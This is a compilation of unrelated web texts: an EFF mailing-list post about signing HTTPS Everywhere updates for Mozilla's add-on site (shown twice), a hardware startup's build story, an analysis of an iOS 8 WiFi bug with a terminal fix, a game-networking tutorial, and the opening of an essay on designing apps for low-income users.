Hi all, The good news is that HTTPS Everywhere is going in AMO eventually. The question is when. The main reason I haven't put it in AMO *yet* is because AMO offers *less* security to users than EFF self-hosting it, ironically. AMO doesn't do any code signing for extensions, so they're only protected by HTTPS. As we saw with Heartbleed, SSL private keys can be compromised. Why wasn't HTTPS Everywhere affected by Heartbleed? Because we sign updates with an offline signing key that EFF keeps on a dedicated airgapped machine. So even if SSL is totally broken, the integrity of updates is guaranteed. Yay! Luckily the AMO update servers weren't using a vulnerable version of OpenSSL, even though the servers that hosted static files (favicons, etc.) were. Had the update servers been affected by Heartbleed, someone could push a malicious update to almost any addon that you had installed from AMO. This is pretty terrifying, given that a malicious Firefox addon can completely and invisibly pwn your browser. So there's two situations that would make me comfortable with putting HTTPS Everywhere in AMO: 1. AMO allows us to sign updates with our offline signing key, which is what Chrome Web Store already does. This is *by far* the easiest route from my perspective. I have opened a bug with Mozilla; please star it! https://bugzilla.mozilla.org/show_bug.cgi?id=999014 2. Once public key pinning lands in Firefox (supposedly scheduled to happen this summer), we can sign HTTPS Everywhere with a CA-signed certificate via this arcane process: https://developer.mozilla.org/en-US/docs/Signing_a_XPI. It would take some wrangling to make it work with an offline private key but probably not impossible. More info inline, but the above was the gist of it. On 04/20/2014 01:58 PM, Dave Warren wrote: > On 2014-04-20 12:53, Andrew Sillers wrote: >> >> Without further comment, I'll call out: >> >> * the FAQ entry on this topic: >> https://www.eff.org/https-everywhere/faq#amo >> > > This one doesn't seem to make sense to me. The Mozilla privacy policy > would only apply to Mozilla possibly keeping track of who downloads the > add-on, but wouldn't automatically make the add-on start intruding on > privacy somehow, would it? This answer is outdated; as mentioned above, the privacy policy isn't the blocker anymore. Will update the FAQ. > More importantly, if a user is happy with a less restrictive privacy > policy, what's the problem? Nothing in particular, except that we realize that users rarely read privacy policies. So there is an argument for developers to provide them with the maximum amount of privacy by default (which is supposedly what we do by not making AMO an option). This is kind of a moot point because I think the popularity benefit of being in AMO outweighs the minor-and-possibly-hypothetical privacy loss. >> * the extant discussion on this topic in the bug tracker: >> https://trac.torproject.org/projects/tor/ticket/9769 >> > > While the approval process is a factor, having some code in the rulesets > that says "Do not apply this rule to versions below 'x'" should negate > the issue of time-sensitive rules, save for the fact that an > incompatible rule simply won't run until the extension is updated. A > small price to pay for making this easy and safe for users. It seems that you're talking about a tangential issue here, which is whether/how ruleset updates should be hosted if/when we get to a point where ruleset updates are independent from extension updates (which will happen if Zack's GSoC project works out). AFAIK, there is no way in AMO to let us update rulesets without updating the entire extension, so we will need to self-host ruleset updates if we want them to be separate from extension updates. > > As far as signing, the ruleset update signing has already been discussed > and can still be done separate from rule updates using EFF's key. Confused here. What's the difference between "ruleset update" and "rule update"? > > It ultimately may not be as simple as just uploading to Mozilla and > being done with it, but it's pretty close to that and it's not as though > EFF is releasing frequent enough updates for Mozilla's slight delay to > be a significant factor, at least IMO. > -- Yan Zhu <yan at eff.org>, <yan at torproject.org> Staff Technologist Electronic Frontier Foundation https://www.eff.org 815 Eddy Street, San Francisco, CA 94109 +1 415 436 9333 x134 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 455 bytes Desc: OpenPGP digital signature URL: <https://lists.eff.org/pipermail/https-everywhere/attachments/20140421/62d2c620/attachment.sig>

More information about the HTTPS-Everywhere mailing list

[HTTPS-Everywhere] HTTPS-Everywhere needs to be on firefox addons

Yan Zhu yan at eff.org
Mon Apr 21 11:14:26 PDT 2014

Hi all, The good news is that HTTPS Everywhere is going in AMO eventually. The question is when. The main reason I haven't put it in AMO *yet* is because AMO offers *less* security to users than EFF self-hosting it, ironically. AMO doesn't do any code signing for extensions, so they're only protected by HTTPS. As we saw with Heartbleed, SSL private keys can be compromised. Why wasn't HTTPS Everywhere affected by Heartbleed? Because we sign updates with an offline signing key that EFF keeps on a dedicated airgapped machine. So even if SSL is totally broken, the integrity of updates is guaranteed. Yay! Luckily the AMO update servers weren't using a vulnerable version of OpenSSL, even though the servers that hosted static files (favicons, etc.) were. Had the update servers been affected by Heartbleed, someone could push a malicious update to almost any addon that you had installed from AMO. This is pretty terrifying, given that a malicious Firefox addon can completely and invisibly pwn your browser. So there's two situations that would make me comfortable with putting HTTPS Everywhere in AMO: 1. AMO allows us to sign updates with our offline signing key, which is what Chrome Web Store already does. This is *by far* the easiest route from my perspective. I have opened a bug with Mozilla; please star it! https://bugzilla.mozilla.org/show_bug.cgi?id=999014 2. Once public key pinning lands in Firefox (supposedly scheduled to happen this summer), we can sign HTTPS Everywhere with a CA-signed certificate via this arcane process: https://developer.mozilla.org/en-US/docs/Signing_a_XPI. It would take some wrangling to make it work with an offline private key but probably not impossible. More info inline, but the above was the gist of it. On 04/20/2014 01:58 PM, Dave Warren wrote: > On 2014-04-20 12:53, Andrew Sillers wrote: >> >> Without further comment, I'll call out: >> >> * the FAQ entry on this topic: >> https://www.eff.org/https-everywhere/faq#amo >> > > This one doesn't seem to make sense to me. The Mozilla privacy policy > would only apply to Mozilla possibly keeping track of who downloads the > add-on, but wouldn't automatically make the add-on start intruding on > privacy somehow, would it? This answer is outdated; as mentioned above, the privacy policy isn't the blocker anymore. Will update the FAQ. > More importantly, if a user is happy with a less restrictive privacy > policy, what's the problem? Nothing in particular, except that we realize that users rarely read privacy policies. So there is an argument for developers to provide them with the maximum amount of privacy by default (which is supposedly what we do by not making AMO an option). This is kind of a moot point because I think the popularity benefit of being in AMO outweighs the minor-and-possibly-hypothetical privacy loss. >> * the extant discussion on this topic in the bug tracker: >> https://trac.torproject.org/projects/tor/ticket/9769 >> > > While the approval process is a factor, having some code in the rulesets > that says "Do not apply this rule to versions below 'x'" should negate > the issue of time-sensitive rules, save for the fact that an > incompatible rule simply won't run until the extension is updated. A > small price to pay for making this easy and safe for users. It seems that you're talking about a tangential issue here, which is whether/how ruleset updates should be hosted if/when we get to a point where ruleset updates are independent from extension updates (which will happen if Zack's GSoC project works out). AFAIK, there is no way in AMO to let us update rulesets without updating the entire extension, so we will need to self-host ruleset updates if we want them to be separate from extension updates. > > As far as signing, the ruleset update signing has already been discussed > and can still be done separate from rule updates using EFF's key. Confused here. What's the difference between "ruleset update" and "rule update"? > > It ultimately may not be as simple as just uploading to Mozilla and > being done with it, but it's pretty close to that and it's not as though > EFF is releasing frequent enough updates for Mozilla's slight delay to > be a significant factor, at least IMO. > -- Yan Zhu <yan at eff.org>, <yan at torproject.org> Staff Technologist Electronic Frontier Foundation https://www.eff.org 815 Eddy Street, San Francisco, CA 94109 +1 415 436 9333 x134 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 455 bytes Desc: OpenPGP digital signature URL: <https://lists.eff.org/pipermail/https-everywhere/attachments/20140421/62d2c620/attachment.sig>

More information about the HTTPS-Everywhere mailing list

How we built Flow

25 November 2014 - 8:00pm

We (YC S13) just launched our product “Flow” on Indiegogo. It’s a programmable and intuitive wireless controller that that gives you high precision and speed.

This post shows the thoughts and the development that went into the product. It includes user experience, product design, hardware and software and can be relevant to any technical and creative person.

Also see Garry Tan’s blog post on why Flow is important for designers and creatives.

If you like Flow, please back our campaign and share it with your friends.

We appreciate your support! Philip, Chirantan, Felix & Tobias

1. The Problem

Our team consists of four people: electrical engineer, software engineer, industrial designer and UX/UI designer.

We use digital tools like Photoshop, Illustrator, Premiere, Rhino and Eagle on a daily basis.
We need to be fast and we need to be good.

We count on our tools to access our favorite actions in a fast and precise way. We want them to help our flow, not disrupt it. Kind of like a musician focusing on the music than the instrument.

That’s not what our work feels like right now.

Example: Photoshop

Brush size control, one of the hundreds of repetitive micro adjustments in Photoshop, either hides behind a right-click popup window with a 2 inch long slider and a tiny text box or keyboard shortcuts with frustratingly large steps.

This process is extremely repetitive and imprecise, feeling more like sorting through an index card system rather than focus on the job at hand. Overall, a time consuming and frustrating experience.

I’m sure a lot of you can relate to this when you’re cutting at the right frame position in in video editing, choosing the right angles in 3D-modelling or adjusting the wire thickness in PCB layouting.

This ultimately affects productivity and quality. It adds to frustration and reduces joy and fun. Do our tools need to be that way?

2. The User Experience

The frustrations piled up. Looking through this stack, we realised that they arose out of a poorly designed user experience. In order to correct these frustrations, we worked out a manifesto including 11 requirements we needed from our solution.

We needed a programmable, haptic and dedicated device that gives us the same precision, speed and feeling as using our hand.

3. The Design

We tried many different ideas. Some evolved while others did not live up to our requirements. We looked for inspiration broadly in two areas:

“Dumb” tools

We looked at everyday things like door knobs or light switches to professional gear like DJ sets or car interiors. We loved the simplicity of knobs and light switches. They are unambiguous and combine multiple senses (like sight, sound and haptics) which reduces your cognitive load and allow you to focus on other things.

“Smart” tools

We also looked at modern input devices. We loved to play around with them and there were things we really liked about them but others that did not meet our requirements. Some devices were very limited in their functionality while others were an overkill for what we needed.

We ultimately worked our way towards a natural, non-intrusive and elegant design that gave us the power, precision and speed that we needed from our tool

“Good design is as little design as possible: less, but better — because it concentrates on the essential aspects, and the products are not burdened with non-essentials. Back to purity, back to simplicity.” — Dieter Rams

We wanted Flow to feel magical and allow us to explore ways to control in 3D space. We used an infrared based hand recognition sensor which gave us this ability. At the same time, it gave the orientation to the device that we needed.
We chose high quality materials. Turned metal gave us the weight and durability that we needed; acrylic glass the sensitivity and ability to work with capacitive sensing.

4. The Technology

Hardware is hard. This is where design meets engineering. At this point, we had to translate our design requirements into technical specifications.

It is a complex equation of precision, cost, dimensions, ease of implementation, energy efficiency and availability of component. All these components have to be carefully assessed, planned and implemented.

At the time of shipping, you product simply needs to work; no bug fixing afterwards. Here are some of the sensors that we used in our prototypes.

Angular Positioning

A potentiometer acts as an adjustable voltage divider by changing the resistance through rotation. Depending on the ADC, it has great resolution, is quite cheap and very easy to implement. The downside is that it is becomes more fragile over time since it requires a direct mechanical connection.

An incremental hollow shaft encoder works by overlapping pulse trains occurring at a frequency proportional to the rotation. Speed and direction of rotation is determined by the phase shift. Implementation of shaft encoders is quite easy but depending on resolution, they can be quite expensive.

Hall effect sensors measure the force of the magnetic field by its influence on charged particles in particular electrons. These sensors are standard components and thus fairly cheap with great availability. Unfortunately, during application, hall effect sensors did not show the required accuracy of measurement.

Laser sensors are already used in high precision computer mice where changes in position are measured by sensing the scattered laser light which is reflected by an object. These sensors are very precise and minimize the mechanical problems in comparison to a potentiometer and shaft encoder since no mechanical connection to the moving object is needed.

Capacitive touch

All above described sensors for angular positioning sensing are standard components and are therefore quite easy to source and implement. This does not apply for capacitive touch sensing. While larger companies need batch sizes above 10,000 to design custom circular touch surfaces, we decided to build our own multitouch surface implemented on the top layer of the PCB; at least for lower batch sizes. This gives us the freedom to add sensitivity to the areas needed, react to changes in layout more quickly and to keep fixed costs for manufacturing low. By following design guidelines for the sensitive electrodes, one can implement keyboards, sliders and rotary wheels. Available ICs on the market like the Freescale MPR121 already handle all capacitive touch events which makes integration fairly easy.

Hand gesture recognition

infrared technology is a standard approach for proximity measurement and gesture recognition. IR light is emitted by an LED while a photo diode measures the intensity of reflected light of an object. By using multiple LEDs, the distance of objects can be measured as well as their movement parallel to the sensor plane. This opens the door to simple gesture recognition for movements like waving up or left. Furthermore, IR technology has the advantage of being quite energy efficient as well as working in complete darkness.

PCB Layouting

One of the main limitations of hardware is its immutability. Once PCB and casing are designed and manufactured, the system is fixed. An update is impossible. For that reason, it is very important to choose the right components, manufacturers and design with care. Prototyping and testing have an extreme significance. Fortunately, rapid prototyping platforms like Arduino shorten development time through the integration of sensors and their firmware into a proven microcontroller environment.

Bluetooth Smart / Low Energy

The choice of wireless technology was a critical one. There were a number of factors we had to consider before making the decision. It had to be fast. It had to be universal. It had to be energy efficient. After trying out several options such as ZigBee, Z-wave, Wi-Fi, Classic Bluetooth, we settled on Bluetooth Low Energy (BLE), also known as Bluetooth Smart.

Energy efficiency: The Classic Bluetooth is a well-known and established wireless technology. But it comes with a side-effect — energy inefficiency. Regardless of whether data is transferred, Bluetooth will consume energy. Enter Bluetooth Low Energy (BLE). It is optimised for low power use at low data rates with simple lithium coin cell batteries in mind. BLE defeated: WiFi

Designed for Sensor Data Communication: In this great post the author compares the two using simple analogies and real life examples. BLE’s Central-Peripherial roles and Generic Attribute Profile allows optimal and efficient communication. One might argue that BLE did to Bluetooth Classic what REST did to HTTP. BLE defeated: Bluetooth Classic, Wifi

Widespread acceptance: Bluetooth Low Energy is widely available in modern computers, phones, tablets and other devices. Not many people using a modern device need to be explained what bluetooth is for. This makes it a universally known and a “friendly” technology. BLE defeated: Zig-bee, Z-wave

Developer Friendly: The widespread acceptance is not only limited to users but also it’s a popular technology in the developer community too. It’s evident that BLE is designed for non-frequent communication of sensor data. Being a universal and developer friendly technology, it just suited Flow which is a careful assembly of sensor technologies.

Developers

Flow speaks Bluetooth Low Energy which is already a very open platform for developers to dive right into. But to make it even easier, we’re building open source SDKs and configuration software for developers and other users alike to customize and personalize Flow to their liking. We’re building gesture recognition algorithms aimed for speed and precision, allowing developers to focus on applications rather than dwelling into interpretation of complex sensor data. AppleScript opened doors to new genre of applications. Being able to communicate with OSX applications which were not designed to be open was a breakthrough. However, not many have been able to tap into it’s potential still. Flow presents a unique opportunity for developers to incorporate it with Flow gestures. Developers will be able to write their own AppleScripts, Shell scripts, keyboard shortcuts and map it to Flow’s gestures using our SDK.

5. Flow

If you’re interested in the final product and if you like Flow, please back our campaign and share it with your friends.

We appreciate your support! Philip, Chirantan, Felix & Tobias

WiFried: iOS 8 WiFi Issue

25 November 2014 - 8:00am
WiFried: iOS 8 WiFi Issue Thanks to @alisa_a for the suggestion on the wavy bacon. Bonjour over AWDL? Please no.

There are many internet forums with thousands of users scratching their heads, wondering if the reason their WiFi performance is severely degraded on iOS 8 is because of their router, their DNS settings (please help these folks the most), that they need to reset their network settings, and more.

I’ve narrowed down the issue to the use of Apple’s Wireless Direct Link (AWDL) that is used for AirDrop, AirPlay, and Gaming connections.

I’ll go out on a limb and say the WiFi issues are because of Apple’s choice of using Bonjour over AWDL and that, given the constraints of the WiFi hardware, this will be difficult to get right. But perhaps I’m crazy, and this is just a bug that can be fixed by Apple.

Apple: Keep Bonjour over Bluetooth and connected WiFi networks. Are there really justifiable gains by advertising and browsing for services over WiFi vs Bluetooth? And If I missed something, it needs to work without interference.

I’ve confirmed this severe WiFi degradation issue still
occurs on iOS 8.1.1 and OSX 10.10.1. This is not fixed.

Background What is AWDL?

AWDL (Apple Wireless Direct Link) is a low latency/high speed WiFi peer-to peer-connection Apple uses for everywhere you’d expect: AirDrop, GameKit (which also uses Bluetooth), AirPlay, and perhaps elsewhere. It works using it’s own dedicated network interface, typically “awdl0".

While some services, like Instant HotSpot, Bluetooth Tethering (of course), and GameKit advertise their services over Bluetooth SDP, Apple decided to advertise AirDrop over WiFi and inadvertently destroyed WiFi performance for millions of Yosemite and iOS 8 users.

How does AWDL work?

Since the iPhone 4, the iOS kernels have had multiple WiFi interfaces to 1 WiFi Broadcom hardware chip.

en0 — primary WiFi interface
ap1 — access point interface used for WiFi tethering
awdl0 — Apple Wireless Direct Link interface (since iOS 7?)

By having multiple interfaces, Apple is able to have your standard WiFi connection on en0, while still broadcasting, browsing, and resolving peer to peer connections on awdl0 (just not well).

2 Channels at the same time!

At any one time, the wifi chip can only communicate at one frequency. Thus, both interfaces would need to be on the same channel when attempting to use both interfaces at the same time. This typically works well when 2 devices are near each other, as they are more then likely connected to the same access point using the same channel.

I did do some tests having 2 devices connected to different channels (one 5ghz and one 2.4ghz) and they were still able to AirDrop successfully (wow Apple), albeit with obvious transfer chunking and at about 1/2 the normal transfer rate when both devices are on the same channel.

P2P device services happen in discoveryd

discoveryd, previously named mDNSResponder, loads the D2D plugins located in /System/Library/PrivateFrameworks/DeviceToDeviceManager.framework/PlugIns/. The specific one causing issue is the WiFiD2DPlugin.bundle.

Currently there are 2 plugins, one for WiFi and one for Bluetooth. As I mentioned above, some services, such as Instant Hotspot, broadcast over the Bluetooth interface while others such as AirDrop, AirPlay, and GameKit may broadcast on multiple interfaces including the Bluetooth, AWDL, and of course, standard en0 WiFi interfaces.

Reproducing the WiFi Performance issues WiFi Jittery/Slow Transfer Speeds

The performance degradation is the bigger of the two symptoms. Once I understood what to look for, it was simple to address/fix, but it was a long journey to get here.

When the device is advertising and browsing for services, there is interference with the WiFi transmission, or perhaps some kind of TDMA of the WiFi chip to support multiple interfaces. The performance effects are very apparent and easy to reproduce.

iOS 8 WiFi Performance Issue — Comparison Video

Effects of AWDL on iOS 8 WiFi Performance

To reproduce this issue on any iPhone

Perform a speed test (many apps to choose from) and simply pull open the Control Center. This will cause the discoveryd process to browse and advertise services over your WiFi interface. You’ll see an immediate reduction in WiFi speeds that will continue for a minute or two while the AWDL interface continues to browse/advertise. This occurs when Bluetooth is turned on as well as turned off, so it doesn’t appear to be a Bluetooth coexistence issue (where Bluetooth and WiFi overlap frequencies and in this case also use the same chip).

Even more interesting is that you can cause an issue with a nearby device. Instead of opening Control Center on the speed testing device, I’ve successfully induced the WiFi issues by simply waking a nearby iOS device. The waking process itself begins a browse and advertise of services that affects other nearby devices.

Slow Ping (”SSH bug”)

On an iPhone 5S, consistently, you’ll see ping times go up to 2 seconds on every other ping. (Yes, who cares about pings very much, but it affects performance too). For those in the JB community, I believe this is what folks have been referring to as the “SSH bug”. The issue is causing a 1–2 second delay on “every” key. Interestingly, when you send data often, the ping latency goes away. i.e if you type pretty quickly for a long period, the connection will be fast. If you press a key once a second, you’ll notice a 2 second delay after each key.

This issue occurs when the kernel disables AWDL, which seems very odd. The system log shows: kernel[0]: 000606.348321 wlan0.W[221] IO80211AWDLPeerManager::doMonitorTimer(): Disabling AWDL due to no services and idle link.

To reproduce this issue on iPhone5S

On your iPhone 5S, the easiest way to reproduce the ping/SSH issue is to set AirDrop to “Off” in Control Center and pull open and close the Control Center. Wait about 20–60 seconds with the phone screen off or on. It’s best performing this activity with no other iOS devices nearby or at least their Bluetooth off. It seems that AWDL will remain around longer when “devices present”, per the kernel log statements in the system log. It’s these specific environmentsal factors that made this narrowing down the root cause so difficult and I’m sure has caused issued with Apple trying to locate the issue as well.

Once the problem begins, it will go away each time services are advertised, browsed, or resolved. In layman’s terms, just open up Control Center again and the ping time will go back to normal (until it’s closed and then another ~20 seconds until the kernel disables AWDL).

AirDrop Everyone vs Contacts Only vs Off

There are some specific nuances surrounding whether AirDrop is set to advertise to no one, contacts only, and everyone. However, despite which you choose, the issue still remains, just in different sequences/time periods/etc.

Bouncing WiFi/Re-associating WiFi

Part of the confusion on what the “fix” was is due to the fact that when the iOS device reconnects to an AP (either turn off/on WiFi on the phone or Forget/reconnect), some of the AWDL characteristics are reset/disabled for a period of time.

Thus, the WiFi performance restores to 100% upon a WiFi bounce until discoveryd begins it’s browse/advertise routines, causing performance degradation and the ping lag issue on the 5S when the kernel disables AWDL again.

Until I figured this out, this made it quite difficult when troubleshooting!

A fix for iOS WiFi

How often do you actually use AirDrop or play games with a nearby device or do AirPlay directly to another device (where you’re not connected to the same WiFi)? I’ve used AirDrop once. It was cool, I enjoyed it, but not worth the WiFi issues it’s causing.

I’ve created a disable feature and conveniently located it in the AirDrop menu located in the Control Center. If you’re jailbroken, you can pick this up in Cydia for free. It’s called “WiFried”.

WiFried will allow you to enable/disable your D2DWiFi/AWDL and can be conveniently turned off/on under the AirDrop settings in Control Center.

I’ll post the source on GitHub shortly.

One Last Thing…

Yosemite WiFi Issues Fix

This issue with D2D/AWDL is the same root cause of the severe WiFi performance degradation affecting users on Yosemite (continues on 10.10.1). Although AirDrop was introduced in OSX Lion and used AWDL, with the release of iOS 8, perhaps there’s more sharing or just some bad new code. AirDrop and AWDL have been active since iOS 7, yet the issue seems to have suddenly appeared in iOS 8.

@rpetrich mentioned AirDrop used to be two incompatible, but identically named protocols until Yosemite/iOS 8. Perhaps this and the changes for continuity introduced bugs in this area.

Turning of AWDL

Perhaps not surprising for Apple users, you actually can’t easily (see below) turn off AWDL/AirDrop in Yosemite. You can remove it from the left side of Finder, but that doesn’t fix the issue. Apple? User choice?

Either way, you can fix your Yosemite WiFi issues, at the cost of disabling AWDL and AirDrop, by typing the following command at the OSX terminal:

sudo ifconfig awdl0 down

And vice versa to restore AirDrop and AWDL (and the WiFi issues)

sudo ifconfig awdl0 up

For clarification: that’s “a w d (lowercase L) (number zero)”

Update: Older Mac’s/MacBooks may not have this interface on Yosemite due to hardware incompatibilities. Based on http://recode.net/2014/10/16/os-x-yosemite-arrives-what-does-it-mean-for-older-macs/, looks like they don’t have full AirDrop and probably don’t support AWDL.

More Hackers Wanted:

I reversed most of the iOS related frameworks, and through trial and error, have determined this is mostly a kernel/driver issue. There’s not much in the iOS userland code except initiation of the advertising, browsing, and resolving. I just glanced at the Yosemite version and there’s more details in there on how this works. If you are so inclined, fire up IDA and take a look at the following framework. Perhaps you’ll be able to figure out more details.

/System/Library/PrivateFrameworks/DeviceToDeviceManager.framework/PlugIns/awdl_d2d.bundle/Contents/MacOS/awdl_d2d

Last Updated: November 24, 2014

@mariociabarra

What every programmer needs to know about game networking

25 November 2014 - 8:00am

Introduction

You’re a programmer. Have you ever wondered how multiplayer games work?

From the outside it seems magical: two or more players sharing a consistent experience across the network like they actually exist together in the same virtual world. But as programmers we know the truth of what is actually going on underneath is quite different from what you see. It turns out that it’s all an illusion. A massive sleight-of-hand. What you perceive as a shared reality is only an approximation unique to your own point of view and place in time.

Peer-to-Peer Lockstep

In the beginning games were networked peer-to-peer, with each each computer exchanging information with each other in a fully connected mesh topology. You can still see this model alive today in RTS games, and interestingly for some reason, perhaps because it was the first way – it’s still how most people think that game networking works.

The basic idea is to abstract the game into a series of turns and a set of command messages when processed at the beginning of each turn direct the evolution of the game state. For example: move unit, attack unit, construct building. All that is needed to network this is to run exactly the same set of commands and turns on each player’s machine starting from a common initial state.

Of course this is an overly simplistic explanation and glosses over many subtle points, but it gets across the basic idea of how networking for RTS games work. You can read more about this networking model here: 1500 Archers on a 28.8: Network Programming in Age of Empires and Beyond.

It seems so simple and elegant, but unfortunately there are several limitations.

First, it’s exceptionally difficult to ensure that a game is completely deterministic; that each turn plays out identically on each machine. For example, one unit could take slightly a different path on two machines, arriving sooner to a battle and saving the day on one machine, while arriving later on the other and erm. not saving the day. Like a butterfly flapping it’s wings and causing a hurricane on the other side of the world, one tiny difference results in complete desynchronization over time.

The next limitation is that in order to ensure that the game plays out identically on all machines it is necessary to wait until all player’s commands for that turn are received before simulating that turn. This means that each player in the game has latency equal to the most lagged player. RTS games typically hide this by providing audio feedback immediately and/or playing cosmetic animation, but ultimately any truly game affecting action may occur only after this delay has passed.

The final limitation occurs because of the way the game synchronizes by sending just the command messages which change the state. In order for this to work it is necessary for all players to start from the same initial state. Typically this means that each player must join up in a lobby before commencing play, although it is technically possible to support late join, this is not common due to the difficulty of capturing and transmitting a completely deterministic starting point in the middle of a live game.

Despite these limitations this model naturally suits RTS games and it still lives on today in games like “Command and Conquer”, “Age of Empires” and “Starcraft”. The reason being that in RTS games the game state consists of many thousands of units and is simply too large to exchange between players. These games have no choice but to exchange the commands which drive the evolution of the game state.

But for other genres, the state of the art has moved on. So that’s it for the deterministic peer-to-peer lockstep networking model. Now lets look at the evolution of action games starting with Doom, Quake and Unreal.

Client/Server

In the era of action games, the limitations of peer-to-peer lockstep became apparent in Doom, which despite playing well over the LAN played terribly over the internet for typical users:

Although it is possible to connect two DOOM machines together across the Internet using a modem link, the resulting game will be slow, ranging from the unplayable (e.g. a 14.4Kbps PPP connection) to the marginally playable (e.g. a 28.8Kbps modem running a Compressed SLIP driver). Since these sorts of connections are of only marginal utility, this document will focus only on direct net connections. (faqs.org)

The problem of course was that Doom was designed for networking over LAN only, and used the peer-to-peer lockstep model described previously for RTS games. Each turn player inputs (key presses etc.) were exchanged with other peers, and before any player could simulate a frame all other player’s key presses needed to be received.

In other words, before you could turn, move or shoot you had to wait for the inputs from the most lagged modem player. Just imagine the wailing and gnashing of teeth that this would have resulted in for the sort of folks who wrote above that “these sorts of connections are of only marginal utility”.

In order to move beyond the LAN and the well connected elite at university networks and large companies, it was necessary to change the model. And in 1996, that’s exactly what John Carmack did when he released Quake using client/server instead of peer-to-peer.

Now instead of each player running the same game code and communicating directly with each other, each player was now a “client” and they all communicated with just one computer called the “server”. There was no longer any need for the game to be deterministic across all machines, because the game really only existed on the server. Each client effectively acted as a dumb terminal showing an approximation of the game as it played out on the server.

In a pure client/server model you run no game code locally, instead sending your inputs such as key presses, mouse movement, clicks to the server. In response the server updates the state of your character in the world and replies with a packet containing the state of your character and other players near you. All the client has to do is interpolate between these updates to provide the illusion of smooth movement and *BAM* you have a networked client/server game.

This was a great step forward. The quality of the game experience now depended on the connection between the client and the server instead of the most lagged peer in the game. It also became possible for players to come and go in the middle of the game, and the number of players increased as client/server reduced the bandwidth required on average per-player.

But there were still problems with the pure client/server model:

While I can remember and justify all of my decisions about networking from DOOM through Quake, the bottom line is that I was working with the wrong basic assumptions for doing a good internet game. My original design was targeted at < 200ms connection latencies. People that have a digital connection to the internet through a good provider get a pretty good game experience. Unfortunately, 99% of the world gets on with a slip or ppp connection over a modem, often through a crappy overcrowded ISP. This gives 300+ ms latencies, minimum. Client. User's modem. ISP's modem. Server. ISP's modem. User's modem. Client. God, that sucks.

Ok, I made a bad call. I have a T1 to my house, so I just wasn't familliar with PPP life. I'm addressing it now.

The problem was of course latency.

What John did next when he released QuakeWorld would change the industry forever.

Client-Side Prediction

In the original Quake you felt the latency between your computer and the server. Press forward and you’d wait however long it took for packets to travel to the server and back to you before you’d actually start moving. Press fire and you wait for that same delay before shooting.

If you’ve played any modern FPS like Call of Duty: Modern Warfare, you know this is no longer what happens. So how exactly do modern FPS games seem to remove the latency on your own actions in multiplayer?

This problem was historically solved in two parts. The first part was client-side prediction of movement developed by John Carmack for QuakeWorld, and later incorporated as part of Unreal’s networking model by Tim Sweeney. The second part was latency compensation developed by Yahn Bernier at Valve for Counterstrike. In this section we’ll focus on that first part – hiding the latency on player movement.

When writing about his plans for the soon to be released QuakeWorld, John Carmack said:

I am now allowing the client to guess at the results of the users movement until the authoritative response from the server comes through. This is a biiiig architectural change. The client now needs to know about solidity of objects, friction, gravity, etc. I am sad to see the elegant client-as-terminal setup go away, but I am practical above idealistic.

So now in order to remove the latency, the client runs more code than it previously did. It is no longer a dumb terminal sending inputs to the server and interpolating between state sent back. Instead it is able to predict the movement of your character locally and immediately in response to your input, running a subset of the game code for your player character on the client machine.

Now as soon as you press forward, there is no wait for a round trip between client and server – your character start moving forward right away.

The difficulty of this approach is not in the prediction, for the prediction works just as normal game code does – evolving the state of the game character forward in time according to the player’s input. The difficulty is in applying the correction back from the server to resolve cases when the client and server disagree about where the player character should be and what it is doing.

Now at this point you might wonder. Hey, if you are running code on the client – why not just make the client authoritative over their player character? The client could run the simulation code for their own character and simply tell the server where they are each time they send a packet. The problem with this is that if each player were able to simply tell the server “here is my current position” it would be trivially easy to hack the client such that a cheater could instantly dodge the RPG about to hit them, or teleport instantly behind you to shoot you in the back.

So in FPS games it is absolutely necessary that the server is the authoritative over the state of each player character, in-spite of the fact that each player is locally predicting the motion of their own character to hide latency. As Tim Sweeney writes in The Unreal Networking Architecture: “The Server Is The Man”.

Here is where it gets interesting. If the client and the server disagree, the client must accept the update for the position from the server, but due to latency between the client and server this correction is necessarily in the past. For example, if it takes 100ms from client to server and 100ms back, then any server correction for the player character position will appear to be 200ms in the past, relative to the time up to which the client has predicted their own movement.

If the client were to simply apply this server correction update verbatim, it would yank the client back in time such that the client would completely undo any client-side prediction. How then to solve this while still allowing the client to predict ahead?

The solution is to keep a circular buffer of past character state and input for the local player on the client, then when the client receives a correction from the server, it first discards any buffered state older than the corrected state from the server, and replays the state starting from the corrected state back to the present “predicted” time on the client using player inputs stored in the circular buffer. In effect the client invisibly “rewinds and replays” the last n frames of local player character movement while holding the rest of the world fixed.

This way the player appears to control their own character without any latency, and provided that the client and server character simulation code is deterministic – giving exactly the same result for the same inputs on the client and server – it is rarely corrected. It is as Tim Sweeney describes:

… the best of both worlds: In all cases, the server remains completely authoritative. Nearly all the time, the client movement simulation exactly mirrors the client movement carried out by the server, so the client’s position is seldom corrected. Only in the rare case, such as a player getting hit by a rocket, or bumping into an enemy, will the client’s location need to be corrected.

In other words, only when the player’s character is affected by something external to the local player’s input, which cannot possibly be predicted on the client, will the player’s position need to be corrected. That and of course, if that player is attempting to cheat

If you enjoyed this article please donate.

Donations offset hosting costs and encourage me to write more articles!

What I Learned from Building an App for Low-Income Americans

25 November 2014 - 8:00am

I was lost in the Bronx. It was my first week as a Significance Labs Fellow, where my job was to create a tech product for some of the American households who earn less than $25,000 a year. In 2013, 45.3 million Americans lived at or below the poverty line, which for a family of four is $23,834.

Another fellow and I spent an hour on the subway from Brooklyn to do a user interview. This area of the Bronx has no cafes or shops, only the odd cluster of fast food joints around a subway station. Yellow cabs don’t drive here. We couldn’t find the address. Google Maps kept moving the location further away. Coming from the technology world, we were confounded when that technology failed us. Eventually, a car service dispatcher told us that the address didn’t exist.

To some extent technology has failed low-income Americans too. Developers don’t build apps for them. Growth hackers ignore them. At Significance Labs, I learned a lot about how low-income Americans live and use technology but also about its limitations, and my own.

It’s The Scarcity, Stupid

Our first week was spent in some of NYC’s poorest neighborhoods interviewing all kinds of people. We talked to a devoted teenage dad in Washington Heights, a school aide in Brownsville, and an undocumented Mexican immigrant who had built a good life for her family on 25 years of babysitting and cleaning jobs. When I asked what her ideal job would be she said “computer programmer.”

The product eventually built by my team was for housecleaners. My colleagues targeted the underbanked, elderly Android users, first-generation college students, and food stamp applicants.

Every person we met had an intensely individual story, but common themes emerged. Like most New Yorkers, our interviewees were busy. Many juggled multiple jobs, and sometimes school, with family responsibilities. Like other Americans, they often traded off time and convenience against cost.

